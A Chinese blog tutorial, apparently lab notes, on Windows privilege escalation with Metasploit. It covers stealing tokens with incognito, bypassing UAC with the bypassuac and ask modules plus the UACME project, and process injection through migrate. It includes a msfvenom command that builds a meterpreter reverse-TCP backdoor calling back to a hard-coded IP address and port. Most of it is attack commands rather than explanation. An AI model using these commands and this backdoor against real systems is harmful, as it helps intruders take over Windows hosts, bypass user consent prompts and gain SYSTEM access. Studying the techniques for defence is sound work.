WIN进程注入&BypassUAC&令牌窃取
WIN进程注入&BypassUAC&令牌窃取
本地提权—win令牌窃取
假冒令牌可以假冒一个网络中的另一个用户进行各类操作。
所以当一个攻击者需要域管理员的操作权限时候,需通过假冒域管理员的令牌进行攻击。
【WIN进程注入&BypassUAC&令牌窃取】我这里用到了windowns2008虚拟机做演示
文章图片
先用msf生成一个后门
msfvenom -p windows/meterpreter/reverse_tcp LHOST=47.94.236.117 LPORT=3333 -f exe -o msf.exe
文章图片
msf上线
文章图片
use incognito 导入模块
list_tokens -u 列出进程
impersonate_token "NT AUTHORITY\SYSTEM" 令牌窃取
文章图片
获得system权限
BypassUAC绕过提权
什么是UAC?如何设置?
UAC(UserAccount Control,用户账户控制)
简言之就是在Vista及更高版本中通过弹框进一步让用户
确认是否授权当前可执行文件来达到阻止恶意程序的目的。
可以通过命令msconfig启动管理器,更改UAC设置等级(默认等级)
参考:http://cn-sec.com/archives/116488.html
BypassUAC提权?常见绕过项目?
为了远程执行目标的exe或者bat可执行文件绕过此安全机制,以此叫BypassUAC
绕过项目:MSF内置,Powershell渗透框架,UACME项目(推荐)
https://github.com/hfiref0x/UACME
在msf自带的提权getsystem中,如果遇到UAC,则不会成功。
win7演示:
文章图片
使用msf自带模块绕过uac
use exploit/windows/local/bypassuac
文章图片
getsystem 获得最高权限
文章图片
另外我用了Win7 虚拟机进行 本地提权
我使用了这个模块:use exploit/windows/local/ask
但是该模块实际上只是以高权限重启一个返回式shellcode,并没有绕过UAC,会触发系统UAC,受害机器有提示,提示用户是否要运行,如果用户选择“yes”,就可以程序返回一个高权限meterpreter shell,相当于钓鱼攻击。
文章图片
文章图片
当用户点击”是“后getsystem。
文章图片
获得最高权限。
进程注入
我用了win2008虚拟机做了演示
ps命令查看进程
文章图片
migrate PID 迁移对应PID
文章图片
获得最高权限
推荐阅读
- 数据结构|winRAR真难用,我决定自创一个(炼虚期) 文件的压缩与解压 将色色一网打尽
- 如何使用WinRAR将一个大文件压缩成多个小的压缩包
- 蓝桥杯|ACwing789. 数的范围 (二分法典型例题)
- 操作系统|完美解决Win11共享打印机连接错误0x00000709教程
- Virtual|VMware——Win11设置登录不需要设输入密码方法
- 使用|使用 Next.js、LeanCloud 和 Tailwind CSS 创建全栈应用
- C/C++/C#|C++(Windows平台下利用LibTorch调用PyTorch模型)
- AcWing|AcWing 1222. 密码脱落
- 深入理解窗口令牌WindowToken
- 计算机系统|进程基本概念